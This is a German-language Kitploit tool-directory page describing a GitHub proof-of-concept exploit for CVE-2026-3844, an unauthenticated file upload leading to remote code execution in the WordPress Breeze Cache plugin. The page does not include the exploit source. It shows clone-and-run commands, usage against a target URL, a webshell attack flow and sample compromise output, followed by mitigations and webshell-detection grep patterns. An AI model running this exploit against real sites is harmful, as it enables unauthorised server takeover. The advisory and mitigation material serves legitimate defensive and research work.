Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-3844 — PoC-Exploit für CVE-2026-3844, eine kritische nicht authentifizierte Datei-Upload-Schwachstelle im WordPress-Breeze-Plugin, die zu RCE führt. | Kitploit
Tools/GitHubGitHub/tausifzaman/cve-2026-3844
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

PoC-Exploit für CVE-2026-3844, eine kritische nicht authentifizierte Datei-Upload-Schwachstelle im WordPress-Breeze-Plugin, die zu RCE führt.

Repository anzeigen
3vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-3844

PoC-Exploit für CVE-2026-3844, eine kritische, nicht authentifizierte Datei-Upload-Schwachstelle im WordPress-Breeze-Plugin, die zu RCE führt.

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 Übersicht

CVE-2026-3844 ist eine KRITISCHE Schwachstelle für nicht authentifizierten, beliebigen Datei-Upload im Breeze-Cache-WordPress-Plugin (von Cloudways), die alle Versionen bis einschließlich 2.4.4 betrifft.

Dieses Repository stellt einen Proof-of-Concept-Exploit (PoC) (CVE-2026-3844.py) für autorisierte Sicherheitsforschung, Penetrationstests und verantwortungsvolle Offenlegung (Responsible Disclosure) bereit.


Einzeiler-Code

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 Schwachstellenübersicht


🔍 Schwachstellendetails

Grundursache

Das Breeze-Cache-Plugin für WordPress ruft entfernte Gravatar-Bilder ab und speichert sie lokal, wenn die Funktion „Host Files Locally – Gravatars" aktiviert ist. Die anfällige Funktion fetch_gravatar_from_remote in class-breeze-cache-cronjobs.php (Zeilen 89–119) führt keine Dateityp- oder Erweiterungsvalidierung des abgerufenen Remote-Inhalts durch.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

Angriffsablauf

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

Auswirkungen

Bei erfolgreicher Ausnutzung kann ein Angreifer:

  • 🔴 Beliebige Betriebssystembefehle ausführen (RCE)
  • 🔴 Permanente Backdoors / Webshells hochladen
  • 🔴 Nicht autorisierte WordPress-Administratorkonten erstellen
  • 🔴 Datenbanken, Anmeldedaten und sensible Dateien exfiltrieren
  • 🔴 Die Website verunstalten oder sämtliche Inhalte löschen
  • 🔴 Den Server nutzen, um auf andere Systeme im selben Netzwerk zu pivotieren
  • 🔴 Den Server in ein Botnetz aufnehmen

⚙️ Anforderungen

  • Python 3.6+
  • requests-Bibliothek
  • Zielseite mit Breeze Cache ≤ 2.4.4 und aktivierter Option „Host Files Locally – Gravatars"

🚀 Installation & Einrichtung

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (Einzeiler)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (keine Einrichtung erforderlich)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 Verwendung

root@kitploit:~
python3 CVE-2026-3844.py

Optionen

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

Beispiele

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ PoC-Demo-Ausgabe

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 Mitigation & Behebung

✅ Sofortmaßnahme

Aktualisieren Sie Breeze Cache auf Version 2.4.5 oder neuer — dies ist die einzige vollständige Lösung.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ Vorübergehende Maßnahmen (falls Sie nicht sofort aktualisieren können)

  1. Deaktivieren Sie die Option „Host Files Locally – Gravatars" in den Breeze-Cache-Einstellungen
  2. Blockieren Sie den anfälligen Endpunkt über eine WAF-Regel oder .htaccess
  3. Verweigern Sie die PHP-Ausführung in den Upload- und Cache-Verzeichnissen:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. Suchen Sie nach neu erstellten/geänderten verdächtigen Dateien:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Blockieren Sie verdächtige POST-Anfragen, die auf die Gravatar-Abruf-Funktion abzielen, über Ihre WAF
  2. Überwachen Sie die Zugriffsprotokolle auf Anfragen an /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 Prüfen, ob bereits kompromittiert

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 Referenzen


👤 Autor

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

Sicherheitsforscher · Bug-Bounty-Jäger · Tool-Entwickler

Android · Python · PHP · Web-Sicherheit · Penetrationstests


⚠️ Rechtlicher Haftungsausschluss

Dieses Repository und der darin enthaltene Exploit-Code werden ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt.

  • ✅ Sie dürfen dieses Tool auf Systemen verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • ❌ Die unbefugte Nutzung gegen Drittsysteme ist gemäß dem Computer Fraud and Abuse Act (CFAA), dem Computer Misuse Act und gleichwertigen Gesetzen weltweit illegal
  • Der Autor übernimmt keinerlei Haftung für Missbrauch, Schäden oder illegale Aktivitäten, die aus der Nutzung dieses Tools resultieren

Hacke ethisch. Melde verantwortungsvoll. Bleib legal. 🛡️


⭐ Wenn dies deiner Forschung geholfen hat, gib dem Repo einen Stern! ⭐

Star   Follow   Website

Tool herunterladen
FeldDetails
CVE-IDCVE-2026-3844
PluginBreeze Cache (von Cloudways)
Betroffene VersionenAlle Versionen ≤ 2.4.4
Gepatchte VersionBreeze 2.4.5+
SchwachstellentypCWE-434 — Uneingeschränkter Upload von Dateien mit gefährlichem Typ
CVSS-v3.1-Score9.8 (KRITISCH)
CVSS-v2.0-Score10.0 (KRITISCH)
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AngriffsvektorNetzwerk (Remote)
Authentifizierung erforderlich❌ Keine — Nicht authentifiziert
Bedingung„Host Files Locally – Gravatars" muss aktiviert sein (standardmäßig deaktiviert)
AuswirkungenVertraulichkeit: HOCH · Integrität: HOCH · Verfügbarkeit: HOCH
Veröffentlicht2026-04-23
QuelleWordfence / NVD / MITRE
PoCTausif Zaman
QuelleLink
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Wordfence-Sicherheitshinweiswordfence.com – Threat Intel
🔗 WordPress-Plugin-Changelogplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 Anfälliger Code (L89)class-breeze-cache-cronjobs.php#L89
🔗 Anfälliger Code (L119)class-breeze-cache-cronjobs.php#L119
🔗 GitHub-SicherheitsempfehlungGHSA-c529-q7mw-hq6j
🔗 PoC-Repositorygithub.com/tausifzaman/CVE-2026-3844